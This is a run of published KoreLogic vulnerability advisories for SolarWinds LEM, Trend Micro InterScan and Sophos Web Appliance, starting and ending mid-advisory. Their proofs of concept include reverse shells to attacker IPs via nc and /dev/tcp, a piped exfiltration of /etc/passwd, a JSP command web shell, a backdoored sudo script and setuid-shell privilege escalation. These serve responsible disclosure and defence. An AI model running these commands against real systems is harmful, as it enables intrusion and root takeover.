anywhere!localhost tcp dpt:postgresql reject-with icmp-port-unreachable However, there are no entries in the ip6tables at all, and the default policy is ACCEPT. --(1)-[1.3.3.8]-[6.3.1]-[root@swi-lem]-- / # ip6tables -L Chain INPUT (policy ACCEPT) target prot opt source destination Chain FORWARD (policy ACCEPT) target prot opt source destination Chain OUTPUT (policy ACCEPT) target prot opt source destination Additionally, two accounts exist with default and simple credentials. --(0)-[1.3.3.8]-[6.3.1]-[root@swi-lem]-- / # head -n 5 /usr/local/contego/scripts/database/pgsql/flow.sql CREATE ROLE trigeo WITH CREATEDB LOGIN PASSWORD 'rootme'; CREATE ROLE contego WITH CREATEDB LOGIN PASSWORD 'reports'; CREATE DATABASE alertdb WITH OWNER trigeo; ALTER DATABASE alertdb OWNER TO trigeo; No further testing was conducted against the Postgres service. However, the following may be possible. 1. Connect to Postgres using hardcoded credentials over IPv6. 2. Run CREATE OR REPLACE FUNCTION which ties to system() in libc.so.6. Example: CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS /lib/libc.so.6, system LANGUAGE C STRICT; privSELECT system(cat /etc/passwd | nc 1.3.3.6 8080); Example credit: http://pentestmonkey.net/cheat-sheet/sql-injection/postgres-sql-injection-cheat-sheet 3. Run system() calls to run commands on the underlying operating system as the postgres user. 4. Mitigation and Remediation Recommendation The vendor has released a Hotfix to remediate this vulnerability. Hotfix and installation instructions are available at: https://thwack.solarwinds.com/thread/111223 5. Credit This vulnerability was discovered by Matt Bergin (@thatguylevel) of KoreLogic, Inc. 6. Disclosure Timeline 2017.02.16 - KoreLogic sends vulnerability report and PoC to Solarwindsusing PGP key with fingerprint A86E 0CF6 9665 0C8C 8A7C C9BA B373 8E9F 951F 918F. 2017.02.20 - Solarwinds replies that the key is no longer in use, requests alternate communication channel. 2017.02.22 - KoreLogic submits vulnerability report and PoC to alternate Solarwinds contact. 2017.02.23 - Solarwinds confirms receipt of vulnerability report. 2017.04.06 - 30 business days have elapsed since Solarwinds acknowledged receipt of vulnerability details. 2017.04.11 - Solarwinds releases hotfix and public disclosure. 2017.04.24 - KoreLogic public disclosure. 7. Proof of Concept swi-lem$ ifconfig eth0 Link encap:Ethernet HWaddr 52:54:00:12:34:56 inet addr:192.168.53.76 Bcast:192.168.53.255 Mask:255.255.255.0 inet6 addr: fe80::5054:ff:fe12:3456/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:681 errors:320 dropped:0 overruns:0
KL-001-2017-008 : Solarwinds LEM Management Shell Arbitrary File Read
KL-001-2017-008 : Solarwinds LEM Management Shell Arbitrary File Read Title: Solarwinds LEM Management Shell Arbitrary File Read Advisory ID: KL-001-2017-008 Publication Date: 2017.04.24 Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2017-008.txt 1. Vulnerability Details Affected Vendor: Solarwinds Affected Product: Log and Event Manager Virtual Appliance Affected Version: v6.3.1 Platform: Embedded Linux CWE Classification: CWE-36: Absolute Path Traversal Impact: Information Disclosure Attack vector: SSH 2. Vulnerability Description The management shell allows the end user to edit the MOTD banner displayed during SSH logon. The editor provided for this is nano. This editor has a keyboard mapped function which lets the user import a file from the local file system into the editor. An attacker can abuse this to read arbitrary files within the allowed permissions. 3. Technical Description Should an attacker gain access to the SSH console for the cmc user, read access to files on the local filesystem can be achieved. The default password for the cmc user is "password". This is accomplished by abusing the editor selection for the MOTD banner edit functionality. $ ssh cmc@1.3.3.7 Password: Linux swi-lem 3.2.0-3-amd64 #1 SMP Mon Jul 23 02:45:17 UTC 2012 x86_64 Last login: Sun Dec 11 11:35:29 2016 from 1.3.3.6 // /// SolarWinds Log & Event Manager /// /// management console /// // Detected VMware Virtual Platform Product Support Key: RPFYJ-2L3RW-RV5T-GA3K-VLULC-XAPTH Available commands: [ appliance ] Network, System [ manager ]Upgrade, Debug [ service ]Restrictions, SSH, Snort [ ndepth ] nDepth Configuration/Maintenance upgrade Upgrade this Appliance adminRun Admin UI (for better usability browse https://1.3.3.7/mvc/configuration) import Import a file that can be used from the Admin UI help display this help exit Exit cmc > appliance Available commands: activate Activate appliance features after licensing. checklogs Check Appliance Logs for Remote Data clearsyslogClear Syslog Logs cleantemp * Clean Up Temporary Files multimanagerconfig * Enable/disable multimanager dateconfig Update Date and Time dbdiskconfig * Configure database retention diskusage Check Disk Usage of your Manager diskusageconfigSet Disk Usage Limit of your Manager editbanner Edit the SSH login banner. exportsyslog Export System Logs hostname Change the Manager Appliance hostname import Import SIM/LEM Backup to LEM limitsyslogConfigure the syslog rotation limit (default: 50) setlogrotate Configure the syslog rotation frequency (hourly or daily) netconfig Configure Network Parameters (IP Address, Netmask, DNS) ntpconfig Update NTP Server Preferences password Change the CMC User Password ping Ping an IP address or hostname reboot Reboot the Manager Appliance resetsystemmac Reset the MAC address of the Appliance shutdown Shut Down the Manager Appliance topView Manager Appliance CPU/Memory Utilization tzconfig Update Time Zone information viewnetconfig View Network Parameters (IP address, netmask, DNS) exit Return to main menu NOTE: Commands with an asterisk (*) include an automatic manager service restart cmc::appliance > editbanner Press to configure the SSH banner. Once inside nano, ^R to get the screen below: File to insert [from ./] : /etc/passwd ^G Get Help ^C Cancel The result will be: root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System
KL-001-2017-007 : Solarwinds LEM Management Shell Escape via Command Injection
KL-001-2017-007 : Solarwinds LEM Management Shell Escape via Command Injection Title: Solarwinds LEM Management Shell Escape via Command Injection Advisory ID: KL-001-2017-007 Publication Date: 2017.04.24 Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2017-007.txt 1. Vulnerability Details Affected Vendor: Solarwinds Affected Product: Log and Event Manager Virtual Appliance Affected Version: v6.3.1 Platform: Embedded Linux CWE Classification: CWE-78: Improper Neutralization of Special Elements used in an OS Command Impact: Privileged Access Attack vector: SSH 2. Vulnerability Description Insufficient input validation in the management interface can be leveraged in order to execute arbitrary commands. This can lead to (root) shell access to the underlying operating system. 3. Technical Description Should an attacker gain access to the SSH console for the cmc user, root access to the underlying operating system can be achieved. The default password for the cmc user is "password". This report details two distinct attack vectors: the username input during SNMP setup and the destination email input during debug. = SNMP = This is accomplished by placing `/bin/bash` in the username input during SNMP server setup. $ ssh cmc@1.3.3.7 Password: Linux swi-lem 3.2.0-3-amd64 #1 SMP Mon Jul 23 02:45:17 UTC 2012 x86_64 Last login: Sun Dec 11 11:25:07 2016 from 1.3.3.6 // /// SolarWinds Log & Event Manager /// /// management console /// // Detected VMware Virtual Platform Product Support Key: RPFYJ-2L3RW-RV5T-GA3K-VLULC-XAPTH Available commands: [ appliance ] Network, System [ manager ]Upgrade, Debug [ service ]Restrictions, SSH, Snort [ ndepth ] nDepth Configuration/Maintenance upgrade Upgrade this Appliance adminRun Admin UI (for better usability browse https://1.3.3.7/mvc/configuration) import Import a file that can be used from the Admin UI help display this help exit Exit cmc > service Available commands: startssh Start the SSH Service stopsshStop the SSH Service restartssh Restart the SSH Service restrictsshRestrict Access to the SSH Service (by IP Address/hostname) unrestrictssh Remove Restrictions on Access to the SSH Service snmp Configure the SNMP Services copysnortrules Copy Snort rules to floppy or network share loadsnortrules Load Snort rules from floppy or network share loadsnortbackupLoad Snort rules from backup restartsnort Restart the Snort Service enableflow * Enable the flow Collection Service disableflowDisable the flow Collection Service restrictconsoleRestrict Access to the Manager Console (GUI) by IP/hostname unrestrictconsole Remove Restrictions on Access to the Console (GUI) restrictreportsRestrict Access to Reports by IP/hostname unrestrictreports Remove Restrictions on Access to Reports stopopsec Stop all running OPSEC LEA client connections help display this help exit Return to main menu NOTE: Commands with an asterisk (*) include an automatic manager service restart cmc::service > snmp SNMP Trap Logging Service is RUNNNING Would you like to STOP the SNMP Trap Logging Service? [Y/n] Y SNMP Request Service is RUNNNING Would you like to STOP the SNMP Request Service? [Y/n] Y The SNMP Trap Logging Service is stopped. The SNMP Request Service is stopped. cmc::service > snmp SNMP Trap Logging Service is DISABLED Would you like to ENABLE the SNMP Trap Logging Service? [Y/n] Y SNMP Request Service is DISABLED Would you like to ENABLE the SNMP Request Service? [Y/n] Y Enter the port number to access SNMP on LEM (default: 161): Enter the username to access SNMP on LEM (default: orion): `/bin/bash` Enter the password hashing algorithm (SHA1, MD5 or NO for no authentication, default: SHA1): Enter the authentication password (default: orion123): Enter the communication encryption algorithm (AES128, DES56 or NO for no encryption, default: AES128): Enter the encryption key (default: orion123): cmc@swi-lem:/usr/local/contego$ = Debug= This is accomplished by placing `/bin/bash` in the destination email input during debug. $ ssh
KL-001-2017-006 : Solarwinds LEM Privilege Escalation via Sudo Script Abuse
KL-001-2017-006 : Solarwinds LEM Privilege Escalation via Sudo Script Abuse Title: Solarwinds LEM Privilege Escalation via Sudo Script Abuse Advisory ID: KL-001-2017-006 Publication Date: 2017.04.24 Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2017-006.txt 1. Vulnerability Details Affected Vendor: Solarwinds Affected Product: Log and Event Manager Virtual Appliance Affected Version: v6.3.1 Platform: Embedded Linux CWE Classification: CWE-269: Improper Privilege Management Impact: Privileged Access Attack vector: SSH 2. Vulnerability Description An attacker can abuse functionality provided by a script which may be run with root privilege in order to elevate privilege. 3. Technical Description Should an attacker gain access to the SSH console for the cmc user, root access to the underlying operating system can be achieved. The default password for the cmc user is "password". The cmc account can run certain script files with root privilege. Listed below: cmc ALL=(ALL) NOPASSWD: /usr/local/contego/scripts/activate.pl, /usr/local/contego/scripts/apply_hotfix, /usr/local/contego/scripts/cleantemp.pl, /usr/local/contego/scripts/contego-archive, /usr/local/contego/scripts/contego-backup, /usr/local/contego/scripts/contego-logbackup, /usr/local/contego/scripts/debugdump.pl, /usr/local/contego/scripts/disable_ipv6.sh, /usr/local/contego/scripts/exportsyslog.pl, /usr/local/contego/scripts/hostname.sh, /usr/local/contego/scripts/ipchains_restore.sh, /usr/local/contego/scripts/managerReset.pl, /usr/local/contego/scripts/mountshare.sh, /usr/local/contego/scripts/mountsolr.pl, /usr/local/contego/scripts/netconfig.sh, /usr/local/contego/scripts/opseccontrol.sh, /usr/local/contego/scripts/rcc.pl, /usr/local/contego/scripts/setupCert.sh, /usr/local/contego/scripts/sim2lem.pl, /usr/local/contego/scripts/snortcontrol.sh, /usr/local/contego/scripts/sshcontrol.sh, /usr/local/contego/scripts/swi_login_update.pl, /usr/local/contego/scripts/timecontrol.sh, /usr/local/contego/scripts/upgrade.pl, /usr/local/contego/scripts/upgrade21.sh, /usr/local/contego/scripts/upgrade_bootloader.sh, /usr/local/contego/scripts/recovery.py, /sbin/shutdown, /usr/bin/lem/lynx-admin-ui One script, upgrade21.sh allows the user to change ownership and permission bits for an arbitrary file. This can be abused to elevate privilege to root. cmc@swi-lem:/usr/local/contego/scripts$ cp /bin/dash /tmp/koresh cmc@swi-lem:/usr/local/contego/scripts$ sudo ./upgrade21.sh setperms /tmp/koresh root root 4755 sudo: unable to resolve host swi-lem cmc@swi-lem:/usr/local/contego/scripts$ /tmp/koresh # id uid=1001(cmc) gid=1000(trigeo) euid=0(root) groups=0(root),4(adm),24(cdrom),25(floppy),104(postgres),105(snort),1000(trigeo),1002(dbadmin) 4. Mitigation and Remediation Recommendation The vendor has released a Hotfix to remediate this vulnerability. Hotfix and installation instructions are available at: https://thwack.solarwinds.com/thread/111223 5. Credit This vulnerability was discovered by Hank Leininger and Matt Bergin (@thatguylevel) of KoreLogic, Inc. 6. Disclosure Timeline 2017.02.16 - KoreLogic sends vulnerability report and PoC to Solarwindsusing PGP key with fingerprint A86E 0CF6 9665 0C8C 8A7C C9BA B373 8E9F 951F 918F. 2017.02.20 - Solarwinds replies that the key is no longer in use, requests alternate communication channel. 2017.02.22 - KoreLogic submits vulnerability report and PoC to alternate Solarwinds contact. 2017.02.23 - Solarwinds confirms receipt of vulnerability report. 2017.04.06 - 30 business days have elapsed since Solarwinds acknowledged receipt of vulnerability details. 2017.04.11 - Solarwinds releases hotfix and public disclosure. 2017.04.24 - KoreLogic public disclosure. 7. Proof of Concept See 3. Technical Description The contents of this advisory are copyright(c) 2017 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/ KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html Our
KL-001-2017-005 : Solarwinds LEM Privilege Escalation via Controlled Sudo Path
KL-001-2017-005 : Solarwinds LEM Privilege Escalation via Controlled Sudo Path Title: Solarwinds LEM Privilege Escalation via Controlled Sudo Path Advisory ID: KL-001-2017-005 Publication Date: 2017.04.24 Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2017-005.txt 1. Vulnerability Details Affected Vendor: Solarwinds Affected Product: Log and Event Manager Virtual Appliance Affected Version: v6.3.1 Platform: Embedded Linux CWE Classification: CWE-281: Improper Preservation of Permissions, CWE-708: Incorrect Ownership Assignment Impact: Privileged Access Attack vector: SSH 2. Vulnerability Description Due to lax filesystem permissions, an attacker can take control of a hardcoded sudo path in order to execute commands as a privileged user. 3. Technical Description Should an attacker gain access to the SSH console for the cmc user, root access to the underlying operating system can be achieved. The default password for the cmc user is "password". Due to underlying filesystem permissions, it is possible for the cmc user to assume control of a path hardcoded in the sudoers file. The attack is started by moving the scripts directory and creating a symlink to a (now) attacker controlled scripts directory. cmc@swi-lem:/usr/local/contego$ mv scripts scripts.real && mkdir scripts && cd scripts.real && for A in * ; do ln -s ../scripts.real/${A} ../scripts/${A} ; done Next, a file specified in the sudoers file is overwritten and then executed using sudo. cmc@swi-lem:/usr/local/contego/scripts$ diff -u hostname.sh hostname.sh.backdoor --- hostname.sh 2005-07-01 20:10:17.0 -0700 +++ hostname.sh.backdoor2016-12-11 12:20:35.0 -0800 @@ -1,5 +1,10 @@ #!/bin/sh +# create a backdoor setuid shell +cp /bin/dash /tmp/sushi +chown root:root /tmp/sushi +chmod 4755 /tmp/sushi + [snip] cmc@swi-lem:/usr/local/contego/scripts$ rm hostname.sh && mv -i hostname.sh.backdoor hostname.sh cmc@swi-lem:/usr/local/contego$ sudo /usr/local/contego/scripts/hostname.sh This results in a suid dash shell being output to /tmp/sushi. cmc@swi-lem:/usr/local/contego$ ls -ld /tmp/sushi -rwsr-xr-x 1 root root 104168 Dec 11 12:21 /tmp/sushi Running this shell results in root privileges. cmc@swi-lem:/usr/local/contego$ /tmp/sushi # id uid=1001(cmc) gid=1000(trigeo) euid=0(root) groups=0(root),4(adm),24(cdrom),25(floppy),104(postgres),105(snort),1000(trigeo),1002(dbadmin) 4. Mitigation and Remediation Recommendation The vendor has released a Hotfix to remediate this vulnerability. Hotfix and installation instructions are available at: https://thwack.solarwinds.com/thread/111223 5. Credit This vulnerability was discovered by Hank Leininger and Matt Bergin (@thatguylevel) of KoreLogic, Inc. 6. Disclosure Timeline 2017.02.16 - KoreLogic sends vulnerability report and PoC to Solarwindsusing PGP key with fingerprint A86E 0CF6 9665 0C8C 8A7C C9BA B373 8E9F 951F 918F. 2017.02.20 - Solarwinds replies that the key is no longer in use, requests alternate communication channel. 2017.02.22 - KoreLogic submits vulnerability report and PoC to alternate Solarwinds contact. 2017.02.23 - Solarwinds confirms receipt of vulnerability report. 2017.04.06 - 30 business days have elapsed since Solarwinds acknowledged receipt of vulnerability details. 2017.04.11 - Solarwinds releases hotfix and public disclosure. 2017.04.24 - KoreLogic public disclosure. 7. Proof of Concept See 3. Technical Description The contents of this advisory are copyright(c) 2017 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/ KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html Our public vulnerability disclosure policy is available at: https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt signature.asc Description: OpenPGP digital signature
KL-001-2017-003 : Trendmicro InterScan Remote Root Access Vulnerability
KL-001-2017-003 : Trendmicro InterScan Remote Root Access Vulnerability Title: Trendmicro InterScan Remote Root Access Vulnerability Advisory ID: KL-001-2017-003 Publication Date: 2017.02.15 Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2017-003.txt 1. Vulnerability Details Affected Vendor: Trendmicro Affected Product: InterScan Web Security Virtual Appliance Affected Version: OS Version 3.5.1321.el6.x86_64; Application Version 6.5-SP2_Build_Linux_1548 Platform: Embedded Linux CWE Classification: CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal'), CWE-434: Unrestricted Upload of File with Dangerous Type Impact: Root Access Attack vector: HTTP 2. Vulnerability Description Any authenticated user can overwrite specific files on the local system, which can be exploited to result in root access. 3. Technical Description An attacker can use a HTTP POST request to instruct the management application to backup the current appliance configuration into a tarball. A valid session is required. POST /servlet/com.trend.iwss.gui.servlet.ConfigBackup?action=download HTTP/1.1 Host: 1.3.3.7:8443 [snip] HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Disposition: attachment; filename="IWSVA6.5-SP2_Config.tar" [snip] Extracting the tar file gives you several files, detailed below: $ tar xf IWSVA6.5-SP2_Config.tar x Configurations/ x Configurations/icaps.pkey x Configurations/ClientConnectionQuotaWhiteList.ini x Configurations/IWSSPINcieScan.dsc [snip] $ cd Configurations/ $ ls -la shadow passwd crontab.iscan crontab.root S55sshd S99lanbypass prd.passwd iscan root -rwxr-xr-x@ 1 level staff 4683 25 oct 05:32 S55sshd -rwxr-xr-x@ 1 level staff 13553 25 oct 05:32 S99lanbypass -rw-r-@ 1 level staff 1738 25 oct 05:32 crontab.iscan -rw-r-@ 1 level staff416 25 oct 05:32 crontab.root -rw-r--r--@ 1 level staff693 25 oct 05:32 passwd -rw-r-@ 1 level staff 44 25 oct 05:32 prd.passwd -- 1 level staff427 25 oct 05:32 shadow -rw---@ 1 level staff 1796 25 oct 05:50 iscan -rw---@ 1 level staff467 25 oct 05:32 root The file content presents several attack scenarios: Obtain hashes for all accounts Poison shadow file with known hash Poison cron with a bash shell Poison scripts executed at boot Directory traversal with web shell The file, root, contains cron entries which are ran by the root user at boot. A bash reverse shell was appended to this file and a new tar file containing the poisoned file was created. $ head -n 1 root 0-59/2 * * * * /usr/iwss/bin/systemupdate > /dev/null 2>&1 $ echo */2 * * * * /bin/bash -i >& /dev/tcp/1.3.3.8/8086 0>&1 >> root $ cd ..; tar cf hacked.tar Configurations/ ProductInfo.xml POST /servlet/com.trend.iwss.gui.servlet.ConfigBackup?action=import=/usr/iwss/AdminUI/tomcat/import/hacked.tar=1 HTTP/1.1 Host: 1.3.3.7:8443 [snip] HTTP/1.1 302 Found Server: Apache-Coyote/1.1 [snip] This resulted in a netcat shell as the root user. $ nc -lv 8086 [root@iwsva65sp2 ~]# id;uname -a uid=0(root) gid=0(root) groups=0(root) Linux iwsva65sp2 2.6.32-504.OpenVA.3.5.1321.el6.x86_64 #1 SMP Tue Dec 23 15:08:35 CST 2014 x86_64 x86_64 x86_64 GNU/Linux [root@iwsva65sp2 ~]# 4. Mitigation and Remediation Recommendation The vendor has issued a patch for this vulnerability in Version 6.5 CP 1737. Security advisory and link to the patched version available at: https://success.trendmicro.com/solution/1116672 5. Credit This vulnerability was discovered by Matt Bergin (@thatguylevel) of KoreLogic, Inc. 6. Disclosure Timeline 2016.12.12 - KoreLogic sends vulnerability report and PoC to Trendmicro. 2016.12.15 - Trendmicro acknowledges receipt of report. 2017.01.11 - Trendmicro informs KoreLogic that the patch to this and other KoreLogic reported issues will likely be available after the 45 business day deadline (2017.02.16). 2017.02.06 - Trendmicro informs KoreLogic that the patched version will be available by 2017.02.14. 2017.02.14 - Trendmicro security advisory released. 2017.02.15 - KoreLogic public disclosure. 7. Proof of Concept See 3. Technical Description. The contents of this advisory are copyright(c) 2017 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/ KoreLogic, Inc. is a founder-owned and operated company
KL-001-2017-001 : Trendmicro InterScan Arbitrary File Write
KL-001-2017-001 : Trendmicro InterScan Arbitrary File Write Title: Trendmicro InterScan Arbitrary File Write Advisory ID: KL-001-2017-001 Publication Date: 2017.02.15 Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2017-001.txt 1. Vulnerability Details Affected Vendor: Trendmicro Affected Product: InterScan Web Security Virtual Appliance Affected Version: OS Version 3.5.1321.el6.x86_64; Application Version 6.5-SP2_Build_Linux_1548 Platform: Embedded Linux CWE Classification: CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal'), CWE-434: Unrestricted Upload of File with Dangerous Type Impact: Remote Code Execution Attack vector: HTTP 2. Vulnerability Description An authenticated user can create files on the local system. This can lead to remote command execution as an authenticated user. 3. Technical Description A servlet takes an arbitrary file path as an output filename, and the webserver can create files in the webroot. So, a malicious .jsp can be uploaded and then executed through a subsequent request to the webserver. Shell courtesy the fuzzdb-project (https://github.com/fuzzdb-project/fuzzdb/blob/master/web-backdoors/jsp/cmd.jsp). POST /servlet/com.trend.iwss.gui.servlet.ConfigBackup?action=upload_check HTTP/1.1 Host: 1.3.3.7:8443 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:49.0) Gecko/20100101 Firefox/49.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: https://1.3.3.7:8443/config_backup_collapsed.jsp Cookie: JSESSIONID=E600D5296A2282C4C7AD46BCDAADEB47 DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: multipart/form-data; boundary=---135470425518767155135967265 Content-Length: 1486 -135470425518767155135967265 Content-Disposition: form-data; name="CSRFGuardToken" 4POCBRSFC1TYEO2D5IHNLLJAX27BNBLF -135470425518767155135967265 Content-Disposition: form-data; name="op" save -135470425518767155135967265 Content-Disposition: form-data; name="uploadfile"; filename="../../../../usr/iwss/AdminUI/tomcat/webapps/ROOT/korelogic.jsp" <%@ page import="java.util.*,java.io.*"%> <% if (request.getParameter("cmd") != null) { out.println("Command: " + request.getParameter("cmd") + ""); Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); } } %> -135470425518767155135967265 Content-Disposition: form-data; name="beFullyOrPartially" 0 -135470425518767155135967265-- HTTP/1.1 302 Found Server: Apache-Coyote/1.1 Location: https://1.3.3.7:8443/config_backup_collapsed.jsp?CSRFGuardToken=4POCBRSFC1TYEO2D5IHNLLJAX27BNBLF=6 Content-Length: 0 Date: Tue, 25 Oct 2016 14:36:07 GMT Connection: close GET /korelogic.jsp?CSRFGuardToken=4POCBRSFC1TYEO2D5IHNLLJAX27BNBLF=id HTTP/1.1 Host: 1.3.3.7:8443 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:49.0) Gecko/20100101 Firefox/49.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: https://1.3.3.7:8443/korelogic.jsp Cookie: JSESSIONID=E600D5296A2282C4C7AD46BCDAADEB47 DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Type: text/html Content-Length: 320 Date: Tue, 25 Oct 2016 14:37:58 GMT Connection: close Command: id uid=498(iscan) gid=499(iscan) groups=499(iscan) 4. Mitigation and Remediation Recommendation The vendor has issued a patch for this vulnerability in Version 6.5 CP 1737. Security advisory and link to the patched version available at: https://success.trendmicro.com/solution/1116672 5. Credit This vulnerability was discovered by Matt Bergin (@thatguylevel) of KoreLogic, Inc. 6. Disclosure Timeline 2016.12.12 - KoreLogic sends vulnerability report and PoC to
KL-001-2016-009 : Sophos Web Appliance Remote Code Execution
KL-001-2016-009 : Sophos Web Appliance Remote Code Execution Title: Sophos Web Appliance Remote Code Execution Advisory ID: KL-001-2016-009 Publication Date: 2016.11.03 Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2016-009.txt 1. Vulnerability Details Affected Vendor: Sophos Affected Product: Web Apppliance Affected Version: v4.2.1.3 Platform: Embedded Linux CWE Classification: CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection'), CWE-88: Argument Injection or Modification Impact: Remote Code Execution Attack vector: HTTP 2. Vulnerability Description An authenticated user of any privilege can execute arbitrary system commands as the non-root webserver user. 3. Technical Description Multiple parameters to the web interface are unsafely handled and can be used to run operating system commands, such as: POST /index.php?c=logs HTTP/1.1 Host: [redacted] User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:46.0) Gecko/20100101 Firefox/46.0 Accept: text/javascript, text/html, application/xml, text/xml, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br DNT: 1 X-Requested-With: XMLHttpRequest X-Prototype-Version: 1.6.1 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 305 Connection: close STYLE=590fca17b230e8cdba0394cfa28ef2eb=today=_xperiod=xdays=_time_start=12%3A00%20AM=_time_end=11%3A59%20PM_filter_user_timeline=test=search=user_timeline`nc%20-e%20/bin/sh%20[redacted]%209191`=test=time=1===1 HTTP/1.1 200 OK Date: Tue, 10 May 2016 15:35:05 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, private, post-check=0, pre-check=0 Pragma: no-cache X-Frame-Options: sameorigin X-Content-Type-Options: nosniff Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 207 {"lastPage":1,"startTime":"2016\/05\/10 12:00 AM","endTime":"2016\/05\/10 4:35 PM","filter":"test","recordsDisplayed":0,"recordsTotal":0,"data":[],"startDateBeforeData":false,"earliestRecord":"1970\/01\/01"} -- The vulnerable parameters are: by, request_id, and txt_filter_domain That request launches the following process on the SWA: 1000 16851 0.0 0.0 2728 1040 ?S15:43 0:00 sh -c /opt/perl/bin/salp-generate-report.pl --report=Filter --res=- --type=user_timeline`nc -e /bin/sh [redacted] 9191` --filter='dGVzdA==' --start='2016/05/10' --end='2016/05/10' --action='' --sid=590fca17b230e8cdba0394cfa28ef2eb From the shell launched via netcat: id;uname -a;uptime uid=1000(spiderman) gid=1000(spiderman) groups=1000(spiderman),16(cron),44(tproxyd),45(wdx) Linux please 3.2.57 #1 SMP Fri Feb 19 18:30:36 UTC 2016 i686 GNU/Linux 15:52:34 up 4:26, 0 users, load average: 0.11, 0.12, 0.15 4. Mitigation and Remediation Recommendation The vendor has issued a fix for this vulnerability in Version 4.3 of SWA. Release notes available at: http://swa.sophos.com/rn/swa/concepts/ReleaseNotes_4.3.html 5. Credit This vulnerability was discovered by Matt Bergin (@thatguylevel) of KoreLogic, Inc. 6. Disclosure Timeline 2016.09.09 - KoreLogic sends vulnerability report and PoC to Sophos 2016.09.14 - Sophos requests KoreLogic re-send vulnerability details. 2016.09.28 - KoreLogic requests status update. 2016.09.28 - Sophos informs KoreLogic that an update including a fix for this vulnerability will be available near the end of October. 2016.10.13 - Sophos informs KoreLogic that the update was released to a limited customer base and is expected to be distributed at-large over the following week. 2016.11.03 - Public disclosure. 7. Proof of Concept See 3. Technical Description. The contents of this advisory are copyright(c) 2016 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/ KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html Our public vulnerability disclosure policy is available at: https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt signature.asc Description: OpenPGP digital signature
KL-001-2016-008 : Sophos Web Appliance Privilege Escalation
